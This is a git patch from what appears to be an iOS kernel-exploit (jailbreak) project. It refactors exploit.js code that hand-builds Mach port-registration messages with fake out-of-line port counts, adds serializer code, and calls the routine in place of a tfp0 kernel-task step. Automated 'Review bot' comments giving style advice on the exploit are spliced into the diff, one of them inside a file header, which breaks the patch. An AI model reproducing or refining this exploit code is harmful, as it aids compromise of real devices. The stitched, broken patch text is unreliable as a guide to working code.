From 7a206940e14b0d269744bd598be075e33ef19aea Mon Sep 17 00:00:00 2001
From: spv420
Date: Mon, 1 Aug 2022 13:45:45 -0400
Subject: fuck
---
 src/stage4/kexp/exploit.js | 43 ++++++++++++++++++++++++-------------------
 src/stage4/lib/native_ptr.js | 31 +++++++++++++++++++++++++------
 src/stage4/main.js | 4 +++-
 3 files changed, 52 insertions(+), 26 deletions(-)
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8103639..327c813 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -277,28 +277,33 @@ function release_port_ptrs(port) {
 function r3gister(task, init_port_set, real_count, fake_count) {
 var mess = shit_heap(0x1000);
-// var InP = mess;
-// var OutP = mess;
-
- var InP = new Request(1, mess);
- var OutP = new Reply(1, mess);
-
- write_u32(InP + 0x18, 1);
- write_u32(InP + 0x1c, init_port_set);
- write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
- write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
- write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
- write_u32(InP + 0x30, fake_count);
- write_u32(InP + 0x0, 0x80001513);
- write_u32(InP + 0x8, task);
- write_u32(InP + 0xc, mig_get_reply_port());
- write_u32(InP + 0x14, 3403);
-
- var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ var InP_ptr = mess;
+ var OutP = mess;
+
+ var InP = new Request_r3(1, mess);
+ var InP_obj = InP.deref();
+
+ InP_obj.msgh_body.msgh_descriptor_count = 1;
+ InP_obj.init_port_set.address = init_port_set;
+ InP_obj.init_port_set.count = real_count;
+ InP_obj.init_port_set.disposition = 19;
+ InP_obj.init_port_set.deallocate = false;
+ InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8);
+ InP_obj.init_port_setCnt = fake_count;
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = task;
+ InP_obj.Head.msgh_local_port = mig_get_reply_port();
+ InP_obj.Head.msgh_id = 3403;
+
+ InP.write(InP_obj);
+
+ var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
 if (ret == KERN_SUCCESS) {
+ // i'm not making a fucking class for this shit
 ret = read_u32(OutP + 0x24);
 }
+
 return ret;
 }
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 81ac562..1ae5456 100644
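Review bot: `InP_ptr` is declared on the first added line of the hunk but never read afterwards — the send goes through `InP.addy` — so `var InP_ptr = mess;` is dead and should be dropped or used consistently. The mach_msg size arguments `0x34` and `0x2c` remain hard-coded literals even though the request is now built through `Request_r3`, whose declared size (24 + 4 + 12 + 8 + 4 = 52 = 0x34 in the native_ptr.js hunk below) is the same number; taking the send size from the type rather than repeating the constant would keep the two from drifting when the layout changes. The reply is still read as a raw offset, `ret = read_u32(OutP + 0x24);`, with a comment acknowledging the inconsistency; a tracked `// TODO: read the reply through a Reply_r3 type once one exists` records the intent more usefully than the current comment.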
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -271,8 +271,7 @@ function Request_r3_buf_to_obj(buf) {
 return ret;
 }
-/*
-function Request_r3_buf_to_obj(buf) {
+function Request_r3_obj_to_buf(obj) {
 var ret = new Uint8Array(this.size);
 var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
 var begin = 0;
@@ -292,16 +291,32 @@ function Request_r3_buf_to_obj(buf) {
 ret[i] = tmp[i - begin];
 }
- var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set[i]);
+ var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set);
+
+ begin = i;
+
+ for (; i < 40; i++) {
+ ret[i] = tmp[i - begin];
+ }
+
+ var tmp = buf_ret(obj.NDR);
 begin = i;
- for (; i < 36; i++) {
+ for (; i < 48; i++) {
 ret[i] = tmp[i - begin];
 }
+ var tmp = u32_to_u8x4(obj.init_port_setCnt);
-}*/
+ begin = i;
+
+ for (; i < 52; i++) {
+ ret[i] = tmp[i - begin];
+ }
+
+ return ret;
+}
 function buf_ret(buf) {
 return buf;
@@ -333,7 +348,11 @@ var mach_msg_type_number_t = uint32_t;
 var Request_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4,
 Request_r3_buf_to_obj,
- buf_ret);
+ Request_r3_obj_to_buf);
+
+/*var Reply_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4,
+ Reply_r3_buf_to_obj,
+ Reply_r3_obj_to_buf);*/
 var mach_msg_trailer_type_t = uint32_t;
 var mach_msg_trailer_size_t = uint32_t;
\ No newline at end of file
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 7baffe2..ec29972 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -154,7 +154,9 @@ function main() {
 // return;
- var tfp0 = get_kernel_task();
+ r3gister(0x41, 0x42, 0x43, 0x44);
+
+// var tfp0 = get_kernel_task();
 syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
 return 0;
--
cgit v1.2.3
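Review bot: The newly un-commented `Request_r3_obj_to_buf` has no header comment, and the only hint at what it produces is the name of its `Request_r3_buf_to_obj` counterpart above; a one-line `// Serialize a Request_r3 object into a Uint8Array of the type's size; field order and offsets must mirror Request_r3_buf_to_obj.` would make the pairing explicit. The function body continues past this hunk (the copy loops are in the next hunk). It is also worth confirming that `this.size` on the first context line resolves to the type's size when native_ptr_type invokes the callback, since it is declared as a plain function and the hunk does not show how it is called; a short comment stating the expected `this` binding would settle that for the next reader.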
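Review bot: In the -292,16 hunk the byte-copy loop is written out four times with the field end offsets 40, 48 and 52 as bare literals, and `tmp` is re-declared with `var` at each step; the loops can each collapse to `ret.set(tmp, i); i += tmp.length;`, which removes the hand-maintained offsets and the redeclarations. Note the behavioral difference before switching: the current loops silently write zeros when `tmp` is shorter than the loop bound and silently drop writes past the end of `ret` (typed-array out-of-range stores are ignored), whereas `set` throws a RangeError on overflow — the throwing behavior is the safer one for a serializer, but it is a change. The enclosing function starts in the previous hunk, so the `i` the loops continue from is declared outside this hunk.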
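Review bot: The commented-out `Reply_r3` declaration added after `Request_r3` in the -333,7 hunk references `Reply_r3_buf_to_obj` and `Reply_r3_obj_to_buf`, neither of which is defined anywhere in this diff, so the block cannot simply be un-commented later without more work; a `// TODO: add Reply_r3 once its buf_to_obj / obj_to_buf serializers exist` line records the intent without leaving dead code that will go stale. The file also still ends without a trailing newline, as the marker after `mach_msg_trailer_size_t` shows.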
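Review bot: In the main.js hunk, `r3gister(0x41, 0x42, 0x43, 0x44);` is called with what look like placeholder constants, its return value is discarded, and the `get_kernel_task()` call it displaces is left commented out rather than removed; if this is a temporary probe, a `// TODO: temporary r3gister probe; restore get_kernel_task()` next to it makes that explicit for whoever reads the commit later. main's body starts and ends outside the hunk.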